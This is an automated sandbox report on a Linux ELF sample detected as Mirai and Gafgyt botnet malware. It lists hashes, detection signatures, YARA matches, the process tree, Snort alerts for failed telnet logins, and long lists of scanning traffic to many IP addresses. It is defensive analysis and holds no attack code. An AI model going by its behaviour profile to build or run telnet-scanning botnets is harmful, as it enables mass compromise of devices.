Loading ...

Play interactive tourEdit tour

Linux Analysis Report 1xtO9V8ku8

Overview

General Information

Sample Name:1xtO9V8ku8
Analysis ID:553464
MD5:aac6e25e1d471c889b0ae7b3939e84ed
SHA1:ed2e1aaf171b7bb4d24c543781f7f831fabe1c61
SHA256:408362634ac9615317b22bea3be9caba9a1ba70db48ff41a9fdd27b60074612e
Tags:32elfintel
Infos:

Most interesting Screenshot:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample tries to kill a process (SIGKILL)
Deletes log files
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553464
Start date:14.01.2022
Start time:23:55:55
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:1xtO9V8ku8
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/53@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • 1xtO9V8ku8 (PID: 5223, Parent: 5119, MD5: aac6e25e1d471c889b0ae7b3939e84ed) Arguments: /tmp/1xtO9V8ku8
  • systemd New Fork (PID: 5374, Parent: 1)
  • logrotate (PID: 5374, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5415, Parent: 5374, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5416, Parent: 5374, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5417, Parent: 5416)
      • invoke-rc.d (PID: 5417, Parent: 5416, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5418, Parent: 5417, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5420, Parent: 5417, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5421, Parent: 5417, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5422, Parent: 5417, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5423, Parent: 5374, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5424, Parent: 5374, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5427, Parent: 5424)
      • rsyslog-rotate (PID: 5427, Parent: 5424, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5428, Parent: 5427, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5375, Parent: 1)
  • install (PID: 5375, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5409, Parent: 1)
  • find (PID: 5409, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5419, Parent: 1)
  • mandb (PID: 5419, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1xtO9V8ku8SUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x976a:$s2: $Id: UPX
  • 0x971b:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5228.1.000000005e833d9b.000000008327e148.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5223.1.000000005e833d9b.000000008327e148.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5225.1.000000005e833d9b.000000006a7ff293.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5227.1.000000005e833d9b.000000008327e148.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5226.1.000000005e833d9b.000000006a7ff293.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    Click to see the 25 entries

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 1xtO9V8ku8Virustotal: Detection: 21%Perma Link
    Source: 1xtO9V8ku8ReversingLabs: Detection: 34%

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41618
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41618
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41634
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41634
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41636
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41636
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41646
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41646
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41652
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41652
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41666
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41666
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41672
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41672
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41688
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41688
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41692
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41692
    Source: TrafficSnort IDS: 716 INFO TELNET access 187.8.108.105:23 -> 192.168.2.23:41698
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 187.8.108.105:23 -> 192.168.2.23:41698
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 66.76.97.117: -> 192.168.2.23:
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 44114 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 44114 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 44114 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59880 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58706 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56064 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 58706
    Source: unknownNetwork traffic detected: HTTP traffic on port 56064 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56064 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39846 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 33692 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60728 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60728 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55434 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58560 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 58560
    Source: unknownNetwork traffic detected: HTTP traffic on port 55434 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 42466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 42466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41008 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52250 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41008 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45652 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59590 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52606 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39416 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 45660 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 49456 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59766 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 56466 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 47086 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 47086
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 46314 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41138 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58916 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58916 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 41138 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58916 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 60001
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 186.118.144.241:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 218.75.52.213:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 39.21.179.73:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 44.193.126.40:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 112.101.103.97:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 69.124.77.13:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 116.153.19.31:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 51.186.223.15:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 116.64.27.188:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 110.102.99.206:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 42.203.175.81:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 101.139.120.77:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 109.114.128.165:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 89.25.6.219:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 18.71.167.138:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 13.255.216.141:2323
    Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 162.110.144.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 132.185.105.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 159.128.177.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 32.249.225.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 176.194.144.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 27.152.49.41:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 197.168.236.244:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.137.82.179:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 45.86.170.89:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 37.13.79.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 203.205.60.238:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 164.189.143.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 167.109.110.144:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 68.81.121.113:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 198.146.130.219:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 19.143.208.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 38.69.87.224:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 204.104.22.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 102.250.71.147:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 108.135.101.228:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 42.243.58.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 162.148.27.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 205.131.142.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 205.43.213.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 184.19.80.1:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 170.116.148.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 209.194.78.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.187.246.24:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 58.80.145.74:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 92.173.70.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 27.123.39.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 9.122.235.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 98.202.128.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 62.61.90.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 101.20.99.68:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 118.127.188.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 175.4.141.155:60001
